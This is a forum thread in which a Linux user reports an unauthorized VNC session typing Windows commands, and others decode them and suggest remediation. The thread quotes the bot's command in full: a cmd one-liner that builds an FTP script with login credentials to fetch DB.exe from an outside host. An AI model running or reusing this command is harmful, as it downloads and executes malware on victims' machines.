a Bot/Human tryed connecting to my vncserver.
Basically at the time I was looking up something on Google and the previous days my friend had been helping me do some stuff in Ubuntu Linux by connecting remotely and so anyhow i was Lookinn something up in Google when suddenly I got a prompt for Someone to access my PC remotely I immediately assumed it was my friend and allowed it and didn't note the IP address and I'm on Linux so the attempt failed in 2 ways heres what i saw when i allowed it this was typed into the Google search box.. What you see could be fragments because i clicked out of the search box a few times..
:evil:h4x0r:evil:n00b:evil:Attempt:evil:below:evil:lol:evil:0wned:evil:
"systemroot%\system32\cmd.exe &echo binary > > &echo get D B.exe >>&echo bye >> &ftp -n -v -s &del & DB.exe &exit"
:evil::evil::evil::evil:evil h4x0r attempt failed:evil::evil::evil::evil:
That is what I can recover, the whole time I figured it was my friend logging and and screwing around but he says he didn't do it i had him connect and look for VNC logs of previous allowed connections he couldn't find any but does anyone know what happened? and where the logs are?
well here are the directory for the logs and you can usually view them with a text editor like gedit.
=> /var/log/messages : General log messages
=> /var/log/boot : System boot log
=> /var/log/debug : Debugging log messages
=> /var/log/auth.log : User login and authentication logs
=> /var/log/daemon.log : Running services such as squid, ntpd and others log message to this file
=> /var/log/dmesg : Linux kernel ring buffer log
=> /var/log/dpkg.log : All binary package log includes package installation and other information
=> /var/log/faillog : User failed login log file
=> /var/log/kern.log : Kernel log file
=> /var/log/lpr.log : Printer log file
=> /var/log/mail.* : All mail server message log files
=> /var/log/mysql.* : MySQL server log file
=> /var/log/user.log : All userlevel logs
=> /var/log/xorg.0.log : X.org log file
=> /var/log/apache2/* : Apache web server log files directory
=> /var/log/lighttpd/* : Lighttpd web server log files directory
=> /var/log/fsck/* : fsck command log
=> /var/log/apport.log : Application crash report / log file
i think this is the log for vnc: /home/user/.vnc/xstartup
I waited for it to its 3 am which makes it a unusual time to be on the computer. but I was busy tonight so..
heres what i got so far which is mising maybe half a second of text cause i screenshotted the IP address
cmd /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s
Specifics: "B0t _A159753b" "xbytez.com" "open ftpd"
Its a bot.with a hostname of "wsip-70-168-158-181.oc.oc.cox.net" IP Address: 70.168.158.181
If you understood what is say's it's trying to create a file called "ik" with instructions which will then pass to the command "ftp" to:
Ftp> open ftpd.xbytez.com.zr 21 ftp> user B0t _A159753b ftp> binary ftp> get DB.exe
I suggest you dump VNC. Check your ports to see what's open and scan your computer with a good A/V program.(In safe mode) Look for DB.exe
I thought this was patched in VNC what version do you have. Anyway you got jacked. Do not leave remote access on all the time, And better yet know who is connecting.
http://isc.sans.org/diary.html?storyid=3630
Go there, apparently it's a bot that is easily attainable. Some kid got hacked while playing a pc game. Could help with your problem.
hellboundhackersok wrote: Lol, that bot tried attacking a windows computer.. and you were on Linux.. so you have nothing to worry about…
linux pwns
Exactly! :) so korg it wouldnt effect me considering the bot typed it all in google i tryed logging into the FTP I could'nt get in whats the user/pass isint the username something like B0T_A157#somthing#somthing#somthing I think its a problem with VNC ill just update VNC see what that does
Wrong read the last line of the code FTP -n -v -s. So you can't use ftp on linux eehh:
http://linux.about.com/od/commands/l/blcmdl1_ftp.htm
Works both ways.